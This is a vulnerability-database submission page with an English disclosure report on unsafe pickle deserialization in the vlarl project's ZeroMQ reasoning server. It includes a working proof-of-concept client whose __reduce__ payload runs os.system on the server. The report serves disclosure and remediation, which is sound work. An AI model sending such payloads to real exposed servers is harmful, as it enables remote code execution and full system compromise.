Отправить #653279: vlarl latest Insecure Deserialization(leads to Remote Code Execution)Информация

Названиеvlarl latest Insecure Deserialization(leads to Remote Code Execution)
Описание# Security Report: Remote Code Execution Vulnerability in `experiments.robot.bridge.reasoning_server::run_reasoning_server` ### Summary A critical Remote Code Execution (RCE) vulnerability exists in `experiments.robot.bridge.reasoning_server::run_reasoning_server`. The server accepts incoming messages and deserializes them using `pickle.loads`, which allows attackers to execute arbitrary code on the host system. ### Details The vulnerable code is located at:[experiments.robot.bridge.reasoning_server::run_reasoning_server]( https://github.com/GuanxingLu/vlarl/blob/main/experiments/robot/bridge/reasoning_server.py#L64-L86) The server listens for incoming messages via ZeroMQ (`zmq`). Received data is deserialized using `pickle.loads(message)`: ```python while True: message = socket.recv() inputs = pickle.loads(message) # Unsafe deserialization result = model.raw_generate(*inputs) socket.send(pickle.dumps(result)) ``` `pickle` is inherently unsafe for untrusted data. Attackers can craft malicious payloads that execute arbitrary code during deserialization. ### Proof of Concept (PoC) 1. Start the vulnerable server: ```shell PYTHONPATH=. python3 experiments/robot/bridge/reasoning_server.py ``` 2. Run the following client code to send a malicious payload: ```python import pickle, zmq class Payload(object): def __reduce__(self): import os return (os.system, ('echo "hacked"',)) context = zmq.Context() socket = context.socket(zmq.REQ) socket.connect("tcp://127.0.0.1:5623") socket.send(pickle.dumps(Payload())) ``` 3. The server will execute `os.system('echo "hacked"')`, demonstrating remote code execution. ### Impact - Attackers can remotely execute arbitrary system commands, leading to full server compromise. - This may result in data theft, service disruption, ransomware, or further attacks on internal infrastructure. ### Recommendation - **Never use `pickle.loads` on data from untrusted sources.** - Replace `pickle` with a safe serialization format such as JSON or MessagePack, and strictly validate all inputs. ### References - [Python pickle documentation (Security Considerations)](https://docs.python.org/3/library/pickle.html#security-concerns) - [OWASP: Deserialization of Untrusted Data](https://owasp.org/www-community/vulnerabilities/Deserialization_of_untrusted_data)
Источник⚠️ https://github.com/GuanxingLu/vlarl/issues/18
Пользователь
 zznQ (UID 64000)
Представление12.09.2025 07:58 (7 месяцы назад)
Модерация25.09.2025 16:12 (13 days later)
Статуспринято
Запись VulDB325846 [GuanxingLu vlarl до 31abc0baf53ef8f5db666a1c882e1ea64def2997 ZeroMQ reasoning_server.py run_reasoning_server Сообщение эскалация привилегий]
Баллы20

ПредыдущийОбзорДалее

Do you want to use VulDB in your project?

Use the official API to access entries easily!